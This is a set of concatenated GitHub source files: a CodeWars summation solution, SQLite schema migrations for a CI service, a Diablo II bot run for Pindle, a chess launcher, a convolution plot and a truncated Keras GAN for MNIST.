The number will always be a positive integer greater than 0.\n\nFor example:\n\nsummation(8) -> 36\n1 + 2 + 3 + 4 + 5 + 6 + 7 + 8\n\n\"\"\"\ndef summation(num):\n # summation = sum(range(num + 1))\n # return summation\n summation = 0\n for i in range(num + 1):\n print(i)\n summation += i\n \n return summation\n\n\n\n\nif __name__ == \"__main__\":\n print(summation(8))\n\n\n\n","repo_name":"iicwerhelihleK/CodeWars","sub_path":"python/8kyu/summation.py","file_name":"summation.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22523220174","text":"import json\nimport sqlite3\nfrom collections.abc import Callable\nfrom datetime import datetime, timezone\nfrom functools import wraps\nfrom typing import Any\nfrom uuid import uuid4\n\nfrom passlib.context import CryptContext\n\nfrom cicada.api.settings import MigrationSettings\n\nmigration_queue = []\n\nMigration = Callable[[sqlite3.Connection], None]\n\n\ndef auto_migrate(version: int) -> Callable[[Migration], Migration]:\n def outer(migration: Migration) -> Migration:\n @wraps(migration)\n def inner(db: sqlite3.Connection) -> None:\n migration(db)\n db.commit()\n\n if get_version(db) == 0:\n db.executescript(\n \"\"\"\n CREATE TABLE _migration_version (version int NOT NULL);\n\n INSERT INTO _migration_version VALUES (1);\n \"\"\"\n )\n\n else:\n db.execute(\n \"UPDATE _migration_version SET version = (?);\",\n [version],\n )\n\n db.commit()\n\n migration_queue.append((version, inner))\n\n return inner\n\n return outer\n\n\n@auto_migrate(version=1)\ndef migrate_v1(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE TABLE sessions (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n uuid TEXT NOT NULL,\n git_sha TEXT,\n status TEXT NOT NULL DEFAULT 'SUCCESS'\n );\n\n CREATE TABLE git_commits (\n -- repo_url TEXT NOT NULL,\n sha TEXT NOT NULL,\n author_username TEXT NOT NULL,\n commit_message TEXT NOT NULL,\n committed_on TEXT NOT NULL\n );\n\n CREATE TABLE terminal_sessions (\n session_id TEXT PRIMARY KEY NOT NULL,\n lines TEXT NOT NULL\n );\n \"\"\"\n )\n\n\n@auto_migrate(version=2)\ndef migrate_v2(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n ALTER TABLE sessions ADD COLUMN started_at TEXT NOT NULL;\n ALTER TABLE sessions ADD COLUMN finished_at TEXT;\n \"\"\"\n )\n\n\n@auto_migrate(version=3)\ndef migrate_v3(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n ALTER TABLE git_commits\n ADD COLUMN repository TEXT NOT NULL\n DEFAULT 'dosisod/cicada2';\n \"\"\"\n )\n\n\n@auto_migrate(version=4)\ndef migrate_v4(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n UPDATE sessions\n SET status='FAILURE'\n WHERE finished_at IS NOT NULL AND status='PENDING';\n \"\"\"\n )\n\n\n@auto_migrate(version=5)\ndef migrate_v5(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n ALTER TABLE sessions\n ADD COLUMN trigger TEXT NOT NULL\n DEFAULT 'git.push';\n \"\"\"\n )\n\n\n@auto_migrate(version=6)\ndef migrate_v6(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE TABLE issues (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n -- TODO: use internal repo id instead of repo URL\n repo_url TEXT NOT NULL,\n platform_id TEXT NOT NULL,\n title TEXT NOT NULL,\n -- TODO: use author table instead of username\n submitted_by TEXT NOT NULL,\n is_locked INTEGER NOT NULL,\n opened_at TEXT NOT NULL,\n body TEXT NOT NULL\n );\n \"\"\"\n 
)\n\n\n@auto_migrate(version=7)\ndef migrate_v7(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"ALTER TABLE sessions ADD COLUMN issue_id INTEGER NULL;\"\n )\n\n\n@auto_migrate(version=8)\ndef migrate_v8(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n ALTER TABLE issues ADD COLUMN provider TEXT NOT NULL DEFAULT 'github';\n \"\"\"\n )\n\n\n@auto_migrate(version=9)\ndef migrate_v9(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE TABLE triggers (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n trigger TEXT NOT NULL,\n data TEXT NOT NULL\n );\n\n ALTER TABLE sessions ADD COLUMN trigger_id INTEGER NOT NULL;\n \"\"\"\n )\n\n\n@auto_migrate(version=10)\ndef migrate_v10(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE TABLE users (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n username TEXT NOT NULL,\n hash TEXT NOT NULL\n );\n \"\"\"\n )\n\n pw = MigrationSettings().default_admin_password\n hash = CryptContext(schemes=[\"bcrypt\"]).hash(pw)\n\n db.cursor().execute(\n \"INSERT INTO users (username, hash) VALUES (?, ?);\", [\"admin\", hash]\n )\n\n\n@auto_migrate(version=11)\ndef migrate_v11(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\"ALTER TABLE sessions DROP COLUMN git_sha;\")\n db.cursor().executescript(\"ALTER TABLE sessions DROP COLUMN issue_id;\")\n\n\n@auto_migrate(version=12)\ndef migrate_v12(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE TABLE github_sso_tokens (\n username TEXT NOT NULL,\n access_token TEXT NOT NULL,\n access_token_expires_at TEXT NOT NULL,\n refresh_token TEXT NOT NULL,\n refresh_token_expires_at TEXT NOT NULL,\n token_type TEXT NOT NULL,\n scope TEXT NOT NULL\n );\n \"\"\"\n )\n\n\n@auto_migrate(version=13)\ndef migrate_v13(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE TABLE repositories (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n provider TEXT NOT NULL,\n url TEXT NOT NULL\n );\n\n CREATE TABLE _user_repos (\n user_id INTEGER NOT NULL,\n repo_id INTEGER NOT NULL,\n perms TEXT NOT NULL\n );\n\n ALTER TABLE users\n ADD COLUMN is_admin INTEGER NOT NULL\n DEFAULT 0;\n\n ALTER TABLE users\n ADD COLUMN platform TEXT NOT NULL\n DEFAULT 'cicada';\n\n UPDATE users\n SET is_admin=1, platform='cicada'\n WHERE username='admin';\n \"\"\"\n )\n\n\n@auto_migrate(version=14)\ndef migrate_v14(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE UNIQUE INDEX ux_repositories_provider_url\n ON repositories(provider, url);\n\n CREATE UNIQUE INDEX ux_users_username_provider\n ON users(username, platform);\n \"\"\"\n )\n\n\n@auto_migrate(version=15)\ndef migrate_v15(db: sqlite3.Connection) -> None:\n rows = db.cursor().execute(\"SELECT * FROM triggers;\")\n\n for row in rows:\n id: int = row[0]\n trigger: str = row[1]\n data: dict[str, Any] = json.loads(row[2]) # type: ignore[misc]\n\n if trigger == \"git.push\":\n repository_url = data.pop(\"repository\")\n elif trigger == \"issue.open\":\n repository_url = data.pop(\"repo_url\")\n else:\n assert False\n\n data[\"repository_url\"] = repository_url\n\n db.cursor().execute(\n \"UPDATE triggers SET data=? 
WHERE id=?\",\n            [json.dumps(data), id],\n        )\n\n\n@auto_migrate(version=16)\ndef migrate_v16(db: sqlite3.Connection) -> None:\n    rows = db.cursor().execute(\"SELECT * FROM triggers;\")\n\n    for row in rows:\n        id: int = row[0]\n        trigger: str = row[1]\n        data: dict[str, Any] = json.loads(row[2]) # type: ignore[misc]\n\n        data[\"type\"] = trigger\n\n        db.cursor().execute(\n            \"UPDATE triggers SET data=? WHERE id=?\",\n            [json.dumps(data), id],\n        )\n\n\n@auto_migrate(version=17)\ndef migrate_v17(db: sqlite3.Connection) -> None:\n    \"\"\"\n    Grab all unique indexes from table, remove all rows, add unique constraint,\n    and then add all the unique rows back in.\n    \"\"\"\n\n    # Using list() to eagerly grab all rows (because we are about to wipe them)\n    rows = list(db.cursor().execute(\"SELECT DISTINCT * FROM _user_repos;\"))\n\n    db.cursor().executescript(\n        \"\"\"\n        DELETE FROM _user_repos;\n\n        CREATE UNIQUE INDEX IF NOT EXISTS ux_user_repos_user_id_repo_id\n        ON _user_repos(user_id, repo_id);\n        \"\"\"\n    )\n\n    for row in rows:\n        user_id: int = row[0]\n        repo_id: int = row[1]\n        perms: str = row[2]\n\n        db.cursor().execute(\n            \"\"\"\n            INSERT INTO _user_repos (user_id, repo_id, perms)\n            VALUES (?, ?, ?);\n            \"\"\",\n            [user_id, repo_id, perms],\n        )\n\n\n@auto_migrate(version=18)\ndef migrate_v18(db: sqlite3.Connection) -> None:\n    def normalize_utc_timezones(date: str) -> str:\n        \"\"\"\n        Convert an ambiguous UTC datetime into an actual UTC datetime.\n        Basically any datetime without a timezone is assumed to be a UTC\n        datetime. For non UTC datetimes the offset will be kept in the form\n        \"±XX:YY\". For UTC timezones, the \"+00:00\" will be replaced with \"Z\" to\n        optimize string length.\n        \"\"\"\n\n        if date.endswith(\"UTC\"):\n            # specifically for parsing Gitlab datetimes\n            return str(\n                datetime.strptime(date, \"%Y-%m-%d %H:%M:%S %Z\").replace(\n                    tzinfo=timezone.utc\n                )\n            ).replace(\"+00:00\", \"Z\")\n\n        if date.endswith(\"Z\"):\n            # str.replace() returns a new string; reassign it so fromisoformat()\n            # below actually sees the \"+00:00\" offset\n            date = date.replace(\"Z\", \"+00:00\")\n\n        d = datetime.fromisoformat(date)\n\n        if not d.tzinfo:\n            d = d.replace(tzinfo=timezone.utc)\n\n        return str(d).replace(\"+00:00\", \"Z\")\n\n    rows = db.cursor().execute(\"SELECT * FROM triggers;\")\n\n    for row in rows:\n        id: int = row[0]\n        data: dict[str, Any] = json.loads(row[2]) # type: ignore[misc]\n\n        datetime_fields = (\"committed_on\", \"opened_at\", \"closed_at\")\n\n        for k, v in data.items():\n            if k in datetime_fields:\n                data[k] = normalize_utc_timezones(v)\n\n        db.cursor().execute(\n            \"UPDATE triggers SET data=? WHERE id=?\",\n            [json.dumps(data, separators=(\",\", \":\")), id],\n        )\n\n\n@auto_migrate(version=19)\ndef migrate_v19(db: sqlite3.Connection) -> None:\n    db.executescript(\"DROP TABLE github_sso_tokens;\")\n\n\n@auto_migrate(version=20)\ndef migrate_v20(db: sqlite3.Connection) -> None:\n    db.executescript(\n        \"\"\"\n        CREATE TABLE waitlist (\n            submitted_at TEXT NOT NULL,\n            email TEXT NOT NULL UNIQUE\n        );\n        \"\"\"\n    )\n\n\n@auto_migrate(version=21)\ndef migrate_v21(db: sqlite3.Connection) -> None:\n    db.executescript(\n        \"\"\"\n        ALTER TABLE users\n        ADD COLUMN uuid TEXT NOT NULL DEFAULT 'invalid';\n        \"\"\"\n    )\n\n    users = db.execute(\"SELECT id FROM users;\").fetchall()\n\n    for (user_id,) in users:\n        db.execute(\n            \"UPDATE users SET uuid=? 
WHERE id=?\", [str(uuid4()), user_id]\n )\n\n db.commit()\n\n assert (\n db.execute(\n \"\"\"\n SELECT COUNT(id)\n FROM users\n WHERE uuid='invalid';\n \"\"\"\n ).fetchone()[0]\n == 0\n )\n\n db.cursor().executescript(\n \"CREATE UNIQUE INDEX IF NOT EXISTS ux_users_uuid ON users(uuid);\"\n )\n\n db.commit()\n\n\n@auto_migrate(version=22)\ndef migrate_v22(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n DROP TABLE git_commits;\n\n DROP TABLE issues;\n \"\"\"\n )\n\n\n@auto_migrate(version=23)\ndef migrate_v23(db: sqlite3.Connection) -> None:\n db.execute(\n \"\"\"\n ALTER TABLE sessions\n ADD COLUMN run_number INTEGER NOT NULL DEFAULT 1;\n \"\"\"\n )\n\n\n@auto_migrate(version=24)\ndef migrate_v24(db: sqlite3.Connection) -> None:\n db.execute(\"UPDATE terminal_sessions SET session_id=session_id || '#1';\")\n\n\n@auto_migrate(version=25)\ndef migrate_v25(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE env_vars (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n repo_id INTEGER NOT NULL,\n key TEXT NOT NULL,\n value TEXT NOT NULL\n );\n\n CREATE UNIQUE INDEX ux_env_vars_repo_id_key\n ON env_vars(repo_id, key);\n \"\"\"\n )\n\n\n@auto_migrate(version=26)\ndef migrate_v26(db: sqlite3.Connection) -> None:\n db.execute(\n \"\"\"\n ALTER TABLE env_vars\n ADD COLUMN \"order\" INTEGER NOT NULL DEFAULT 0;\n \"\"\"\n )\n\n\n@auto_migrate(version=27)\ndef migrate_v27(db: sqlite3.Connection) -> None:\n db.execute(\n \"\"\"\n UPDATE triggers\n SET data=json_insert(data, '$.ref', 'refs/heads/master')\n WHERE trigger = 'git.push';\n \"\"\"\n )\n\n\n@auto_migrate(version=28)\ndef migrate_v28(db: sqlite3.Connection) -> None:\n db.execute(\"ALTER TABLE users ADD COLUMN last_login TEXT;\")\n\n\n@auto_migrate(version=29)\ndef migrate_v29(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE installations (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n uuid TEXT NOT NULL,\n name TEXT NOT NULL,\n provider TEXT NOT NULL,\n scope TEXT NOT NULL\n );\n\n CREATE UNIQUE INDEX ux_installations_name_provider\n ON installations(name, provider);\n\n CREATE TABLE _installation_users (\n installation_id INTEGER NOT NULL,\n user_id INTEGER NOT NULL,\n perms TEXT NOT NULL\n );\n\n CREATE UNIQUE INDEX ux_installation_users\n ON _installation_users(installation_id, user_id);\n \"\"\"\n )\n\n\n@auto_migrate(version=30)\ndef migrate_v30(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n ALTER TABLE installations\n ADD COLUMN provider_id TEXT NOT NULL\n DEFAULT '';\n\n ALTER TABLE installations\n ADD COLUMN provider_url TEXT NOT NULL\n DEFAULT '';\n\n DROP INDEX ux_installations_name_provider;\n\n CREATE UNIQUE INDEX ux_installations_provider_info\n ON installations(name, provider, provider_id, provider_url);\n \"\"\"\n )\n\n\n@auto_migrate(version=31)\ndef migrate_v31(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE VIEW v_user_sessions AS\n SELECT\n u.id AS user_id,\n u.uuid AS user_uuid,\n u.username AS username,\n u.platform AS user_provider,\n r.id AS repo_id,\n r.url AS repo_url,\n s.id AS session_id,\n s.uuid AS session_uuid,\n s.status AS session_status,\n s.started_at AS session_started_at,\n s.finished_at AS session_finished_at,\n s.run_number AS session_run,\n t.data AS trigger_data\n FROM _user_repos ur\n JOIN repositories r ON r.id = ur.repo_id\n JOIN users u ON u.id = ur.user_id\n JOIN triggers t ON t.data->>'repository_url' = r.url\n JOIN sessions s ON s.trigger_id = t.id;\n \"\"\"\n )\n\n\n@auto_migrate(version=32)\ndef 
migrate_v32(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n DROP VIEW v_user_sessions;\n\n CREATE VIEW v_user_sessions AS\n SELECT\n u.id AS user_id,\n u.uuid AS user_uuid,\n u.username AS username,\n u.platform AS user_provider,\n r.id AS repo_id,\n r.url AS repo_url,\n ur.perms AS repo_perms,\n s.id AS session_id,\n s.uuid AS session_uuid,\n s.status AS session_status,\n s.started_at AS session_started_at,\n s.finished_at AS session_finished_at,\n s.run_number AS session_run,\n t.data AS trigger_data\n FROM _user_repos ur\n JOIN repositories r ON r.id = ur.repo_id\n JOIN users u ON u.id = ur.user_id\n JOIN triggers t ON t.data->>'repository_url' = r.url\n JOIN sessions s ON s.trigger_id = t.id;\n \"\"\"\n )\n\n\n@auto_migrate(version=33)\ndef migrate_v33(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE _installation_repos (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n installation_id INTEGER NOT NULL,\n repo_id INTEGER NOT NULL\n );\n\n CREATE UNIQUE INDEX ux_installation_repos_ids\n ON _installation_repos(installation_id, repo_id);\n\n CREATE VIEW v_session_runtime_metrics AS\n SELECT\n i.id AS installation_id,\n i.uuid AS installation_uuid,\n s.id AS session_id,\n s.uuid AS session_uuid,\n s.status AS session_status,\n s.started_at AS session_started_at,\n s.finished_at AS session_finished_at,\n s.run_number AS session_run,\n r.id AS repo_id,\n iif(\n s.finished_at IS NULL,\n -1,\n unixepoch(s.finished_at) - unixepoch(s.started_at)\n ) AS seconds\n FROM sessions s\n JOIN triggers t ON t.id = s.trigger_id\n JOIN repositories r ON r.url = t.data->>'repository_url'\n JOIN _installation_repos ir ON ir.repo_id = r.id\n JOIN installations i ON i.id = ir.installation_id\n \"\"\"\n )\n\n\n@auto_migrate(version=34)\ndef migrate_v34(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n ALTER TABLE repositories\n ADD COLUMN is_public INTEGER NOT NULL\n DEFAULT 0;\n\n DROP VIEW v_user_sessions;\n\n CREATE VIEW v_user_sessions AS\n SELECT\n u.id AS user_id,\n u.uuid AS user_uuid,\n u.username AS username,\n u.platform AS user_provider,\n r.id AS repo_id,\n r.url AS repo_url,\n r.is_public AS repo_is_public,\n ur.perms AS repo_perms,\n s.id AS session_id,\n s.uuid AS session_uuid,\n s.status AS session_status,\n s.started_at AS session_started_at,\n s.finished_at AS session_finished_at,\n s.run_number AS session_run,\n t.data AS trigger_data\n FROM _user_repos ur\n JOIN repositories r ON r.id = ur.repo_id\n JOIN users u ON u.id = ur.user_id\n JOIN triggers t ON t.data->>'repository_url' = r.url\n JOIN sessions s ON s.trigger_id = t.id;\n \"\"\"\n )\n\n\n@auto_migrate(version=35)\ndef migrate_v35(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE workflows (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n uuid TEXT UNIQUE NOT NULL,\n session_id TEXT NOT NULL,\n status TEXT NOT NULL,\n sha TEXT NOT NULL,\n filename TEXT NOT NULL,\n started_at TEXT NOT NULL,\n finished_at TEXT NULL,\n run_number INT NOT NULL,\n rerun_number INT NOT NULL\n );\n \"\"\"\n )\n\n sessions = db.execute(\n \"\"\"\n SELECT\n uuid,\n status,\n started_at,\n finished_at,\n trigger,\n trigger_id,\n run_number\n FROM sessions;\n \"\"\"\n ).fetchall()\n\n for session in sessions:\n db.execute(\n \"\"\"\n INSERT INTO workflows (\n uuid,\n session_id,\n status,\n sha,\n filename,\n started_at,\n finished_at,\n run_number,\n rerun_number\n ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);\n \"\"\",\n [\n str(uuid4()),\n session[\"uuid\"],\n session[\"status\"],\n 
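# the placeholders bind in column order, so the session's trigger value fills the sha column here\n            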
session[\"trigger\"],\n \"\",\n session[\"started_at\"],\n session[\"finished_at\"],\n session[\"run_number\"],\n 1,\n ],\n )\n\n db.commit()\n\n\n@auto_migrate(version=36)\ndef migrate_v36(db: sqlite3.Connection) -> None:\n db.executescript(\"ALTER TABLE users ADD COLUMN email TEXT;\")\n\n\n@auto_migrate(version=37)\ndef migrate_v37(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE runners (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n uuid TEXT NOT NULL UNIQUE,\n installation_uuid TEXT NOT NULL,\n secret TEXT NOT NULL,\n groups TEXT NOT NULL\n );\n \"\"\"\n )\n\n\n@auto_migrate(version=38)\ndef migrate_v38(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n ALTER TABLE sessions\n ADD COLUMN run_on_self_hosted INT NOT NULL DEFAULT 0;\n\n ALTER TABLE workflows\n ADD COLUMN run_on_self_hosted INT NOT NULL DEFAULT 0;\n\n DROP VIEW v_user_sessions;\n\n CREATE VIEW v_user_sessions AS\n SELECT\n u.id AS user_id,\n u.uuid AS user_uuid,\n u.username AS username,\n u.platform AS user_provider,\n r.id AS repo_id,\n r.url AS repo_url,\n r.is_public AS repo_is_public,\n ur.perms AS repo_perms,\n s.id AS session_id,\n s.uuid AS session_uuid,\n s.status AS session_status,\n s.started_at AS session_started_at,\n s.finished_at AS session_finished_at,\n s.run_number AS session_run,\n t.data AS trigger_data,\n s.run_on_self_hosted as session_run_on_self_hosted\n FROM _user_repos ur\n JOIN repositories r ON r.id = ur.repo_id\n JOIN users u ON u.id = ur.user_id\n JOIN triggers t ON t.data->>'repository_url' = r.url\n JOIN sessions s ON s.trigger_id = t.id;\n \"\"\"\n )\n\n\n@auto_migrate(version=39)\ndef migrate_v39(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE cache_objects (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n uuid TEXT NOT NULL UNIQUE,\n repository_url TEXT NOT NULL,\n key TEXT NOT NULL,\n session_id INT NOT NULL,\n created_at TEXT NOT NULL\n );\n \"\"\"\n )\n\n\n@auto_migrate(version=40)\ndef migrate_v40(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE secrets (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n scope TEXT NOT NULL,\n repo_id INTEGER NULL,\n installation_uuid NULL,\n updated_at TEXT NOT NULL,\n key TEXT NOT NULL,\n ciphertext TEXT NOT NULL\n );\n\n CREATE UNIQUE INDEX ux_secrets\n ON secrets (\n scope,\n IFNULL(repo_id, -1),\n IFNULL(installation_uuid, ''),\n key\n );\n \"\"\"\n )\n\n\n@auto_migrate(version=41)\ndef migrate_v41(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n ALTER TABLE sessions\n ADD COLUMN title TEXT NULL;\n\n ALTER TABLE workflows\n ADD COLUMN title TEXT NULL;\n\n DROP VIEW v_user_sessions;\n\n CREATE VIEW v_user_sessions AS\n SELECT\n u.id AS user_id,\n u.uuid AS user_uuid,\n u.username AS username,\n u.platform AS user_provider,\n r.id AS repo_id,\n r.url AS repo_url,\n r.is_public AS repo_is_public,\n ur.perms AS repo_perms,\n s.id AS session_id,\n s.uuid AS session_uuid,\n s.status AS session_status,\n s.started_at AS session_started_at,\n s.finished_at AS session_finished_at,\n s.run_number AS session_run,\n t.data AS trigger_data,\n s.run_on_self_hosted as session_run_on_self_hosted,\n s.title as session_title\n FROM _user_repos ur\n JOIN repositories r ON r.id = ur.repo_id\n JOIN users u ON u.id = ur.user_id\n JOIN triggers t ON t.data->>'repository_url' = r.url\n JOIN sessions s ON s.trigger_id = t.id;\n \"\"\"\n )\n\n\ndef get_version(db: sqlite3.Connection) -> int:\n try:\n cursor = db.cursor()\n cursor.execute(\"SELECT version FROM 
_migration_version;\")\n\n return int(cursor.fetchone()[0])\n\n except sqlite3.OperationalError:\n return 0\n\n\ndef migrate(db: sqlite3.Connection) -> None:\n current_version = get_version(db)\n\n for migration_version, migration in migration_queue:\n if current_version < migration_version:\n migration(db)\n\n\nif __name__ == \"__main__\":\n # TODO: allow this to be configured\n db = sqlite3.connect(\"./db.db3\")\n db.row_factory = sqlite3.Row\n\n migrate(db)\n","repo_name":"Cicada-Software/cicada","sub_path":"cicada/api/infra/migrate.py","file_name":"migrate.py","file_ext":"py","file_size_in_byte":24419,"program_lang":"python","lang":"en","doc_type":"code","stars":504,"dataset":"github-code","pt":"37"} +{"seq_id":"1499931369","text":"from char import IChar\nfrom config import Config\nfrom logger import Logger\nfrom pather import Location, Pather\nfrom typing import Union\nfrom item.pickit import PickIt\nfrom template_finder import TemplateFinder\nfrom town.town_manager import TownManager\nfrom ui import UiManager\nfrom utils.misc import wait\n\n\nclass Pindle:\n def __init__(\n self,\n template_finder: TemplateFinder,\n pather: Pather,\n town_manager: TownManager,\n ui_manager: UiManager,\n char: IChar,\n pickit: PickIt\n ):\n self._config = Config()\n self._template_finder = template_finder\n self._pather = pather\n self._town_manager = town_manager\n self._ui_manager = ui_manager\n self._char = char\n self._pickit = pickit\n\n def approach(self, start_loc: Location) -> Union[bool, Location]:\n # Go through Red Portal in A5\n Logger.info(\"Run Pindle\")\n loc = self._town_manager.go_to_act(5, start_loc)\n if not loc:\n return False\n if not self._pather.traverse_nodes((loc, Location.A5_NIHLATHAK_PORTAL), self._char):\n return False\n wait(0.5, 0.6)\n found_loading_screen_func = lambda: self._ui_manager.wait_for_loading_screen(2.0)\n if not self._char.select_by_template([\"A5_RED_PORTAL\", \"A5_RED_PORTAL_TEXT\"], found_loading_screen_func, telekinesis=False):\n return False\n return Location.A5_PINDLE_START\n\n def battle(self, do_pre_buff: bool) -> Union[bool, tuple[Location, bool]]:\n # Kill Pindle\n if not self._template_finder.search_and_wait([\"PINDLE_0\", \"PINDLE_1\"], threshold=0.65, time_out=20).valid:\n return False\n if do_pre_buff:\n self._char.pre_buff()\n # move to pindle\n if self._char.can_teleport():\n self._pather.traverse_nodes_fixed(\"pindle_safe_dist\", self._char)\n else:\n if not self._pather.traverse_nodes((Location.A5_PINDLE_START, Location.A5_PINDLE_SAFE_DIST), self._char):\n return False\n self._char.kill_pindle()\n wait(0.2, 0.3)\n picked_up_items = self._pickit.pick_up_items(self._char)\n return (Location.A5_PINDLE_END, picked_up_items)\n","repo_name":"jagarop/botty-memread_lk","sub_path":"src/run/pindle.py","file_name":"pindle.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"8273811363","text":"\"\"\"\nCOMP.CS.100\nAuthor: Oskari Heinonen\n\nChess game with a gui.\n\nFeatures:\n - Can only make legal moves\n - Basic AI to play against\n - Customizable board\n - 2 player mode\n\nLimitations:\n - Can only play as white against AI\n - AI is stupid\n - No castling, en passant, or promotions\n - Doesn't recognize checkmates except usually for black when\n using defensive AI\n - Doesn't recognize stalemates\n\"\"\"\n\nfrom gui import *\nfrom game import *\n\ndef main():\n game = Game()\n gui = Gui(game)\n gui.start()\n\nif __name__ == \"__main__\":\n 
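# build the game model and its GUI, then hand control to the interface\n    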
main()\n","repo_name":"ozkarii/chess","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74106485548","text":"import sympy as sym\nimport itertools\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom scipy import linalg\nfrom printing import print_coeffs, print_matrix\nimport string\nRat = sym.Rational\nMat = sym.Matrix\nSym = sym.symbols\nHalf = Rat(1,2)\nThird = Rat(1,3)\nQuarter = Rat(1,4)\nfrom math import factorial, sqrt, sin\ndef Rec(n):\n    return Rat(1, n)\nfrom plotting import plot_linspace_func\n\na = -5\nb = 5\n# f = sin\nf = lambda x: 1 if 0 <= x and x <= 1 else 0\ng = lambda x: abs(x)/2\nnodes = 100\ndt = (b - a)/(nodes - 1)\nplot_linspace_func(a, b, nodes, f)\nplot_linspace_func(a, b, nodes, g)\nplot_linspace_func(a, b, nodes, lambda x: sum(f(y)*g(x-y)*dt for y in np.linspace(a, b, nodes)))\n\nplt.show()\n\nns = [0,0,0, 1, 3, 1, -2, 8, 4, 0,0,0]\ndef get_ns(i):\n    if i < 0 or i >= len(ns):\n        return 0\n    return ns[i]\ndiffs = [get_ns(i-1) - 2*get_ns(i) + get_ns(i+1) for i in range(len(ns))]\nprint(diffs)\nprint(sum(diffs))\n\n","repo_name":"LucasPayne/python_math","sub_path":"convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"25080471371","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.models import Sequential\n\nOUT_DIR = './CNN_OUT_img/'\nif not os.path.exists(OUT_DIR):\n    os.makedirs(OUT_DIR)\n\n# variable declarations\nimg_shape = (28, 28, 1)\nepoch = 50000\nbatch_size = 128\nnoise = 100\nsample_interval = 100\n\n# load the data\n# load only the training split\n(X_train , _), (_, _) = mnist.load_data()\nprint(X_train.shape)\n\nX_train = X_train / 127.5 - 1 # scale values into the range -1 ~ 1\nX_train = np.expand_dims(X_train, axis = 3) # add a channel axis (same effect as reshape)\nprint(X_train.shape)\n\n# build generator\ngenerator_model = Sequential()\ngenerator_model.add(Dense(256*7*7, input_dim=noise))\ngenerator_model.add(Reshape((7,7,256)))\n# Conv2DTranspose - convolution after upsampling\ngenerator_model.add(Conv2DTranspose(128, kernel_size=3,\n                                    strides=2, padding='same'))\n# kernel_size:(3,3), stride=2 (upsamples by 2x)\ngenerator_model.add(BatchNormalization())\ngenerator_model.add(LeakyReLU(alpha=0.01))\n\ngenerator_model.add(Conv2DTranspose(64, kernel_size=3,\n                                    strides=1, padding='same'))\ngenerator_model.add(BatchNormalization())\ngenerator_model.add(LeakyReLU(alpha=0.01))\n\n# binary classifier: the final layer outputs a single channel\n# strides: how far the kernel moves per step; with stride > 1 the output shrinks even with padding\ngenerator_model.add(Conv2DTranspose(1, kernel_size=3,\n                                    strides=2, padding='same'))\ngenerator_model.add(Activation('tanh'))\n\ngenerator_model.summary()\n\n\n\n# build discriminator\ndiscriminator_model = Sequential()\ndiscriminator_model.add(Conv2D(32, kernel_size=3,\n                 strides=2, padding='same', input_shape=img_shape))\ndiscriminator_model.add(LeakyReLU(alpha=0.01))\n\ndiscriminator_model.add(Conv2D(64, kernel_size=3,\n                 strides=2, padding='same'))\n#discriminator_model.add(BatchNormalization())\ndiscriminator_model.add(LeakyReLU(alpha=0.01))\n\ndiscriminator_model.add(Conv2D(128, kernel_size=3,\n                 strides=2, 
